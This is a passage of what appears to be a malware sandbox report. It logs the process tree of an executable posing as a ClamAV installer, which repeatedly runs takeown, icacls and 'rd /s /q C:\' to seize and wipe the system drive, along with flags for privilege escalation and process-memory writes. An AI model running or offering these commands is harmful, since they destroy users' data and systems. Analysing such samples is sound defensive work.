    3⤵
    PID:4592
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10368
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5488
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10920
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11032
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:10848
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11248
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:10552
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10452
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10640
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10992
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6032
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5784
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6064
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6132
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11028
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10640
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11252
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2556
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11180
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11232
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:3192
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:1868
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10848
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5288
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:1696
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6292
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:6788
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:5016
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:640
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:748
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6340
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5656
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:5980
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6852
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7836
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11200
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5500
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6660
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5328
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:4512
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:6564
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:5488
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7692
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7884
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:6708
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6240
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6716
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:10600
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6940
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8076
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6536
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6564
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:7172
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10620
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8080
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7936
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6396
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:6220
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7536
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:8028
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:8424
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8912
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7192
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7064
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6468
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5488
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7740
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:6564
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8360
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8208
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8968
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7656
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6220
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8888
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7128
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:3976
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:8656
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5980
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11332
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11340
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11464
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11576
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11588
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11704
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11836
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:11852
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11952
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:12060
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:12084
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:12204
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7224
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9328
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8888
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11504
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11700
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11820
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:11796
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11704
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:12164
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11776
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8540
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:12204
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:11340
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11484
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11984
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:11888
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:12128
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 1236
    3⤵
    - Program crash
    PID:8588
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\thirdpartyclamavinstaller.exe" "C:\Users\Admin\thirdpartyclamavinstaller.exe" & pause
  2⤵
  PID:2896
- C:\Users\Admin\AppData\Local\Temp\thirdpartyclamavinstaller.exe
  "C:\Users\Admin\AppData\Local\Temp\thirdpartyclamavinstaller.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3280
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:3712
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:2616
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:1244
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:3620
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:3036
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:1444
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:3276
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:4960
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:3908
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:4448
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:1092
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:4612
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3908
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:1572
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3356
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:5108
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:2368
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4488
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5160
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5248
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:5448
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5456
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5688
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5808
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5956
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6048
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5228
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5412
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:5340
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5256
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3160
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5728
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6044
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:3200
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6132
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:5964
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:5996
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5592
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5780
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5256
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5268
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2916
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5184
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6048
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:5532
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5136
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3668
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5972
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5160
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6204
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6320
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6328
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6408
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6524
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6540
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6656
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6816
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6836
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6908
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7040
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7048
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:7152
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6168
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6164
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6308
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6496
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6476
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6768
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6828
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6888
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7020
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6152
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7160
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6448
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6308
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:7152
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:6708
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5224
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6980
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:5972
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5184
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
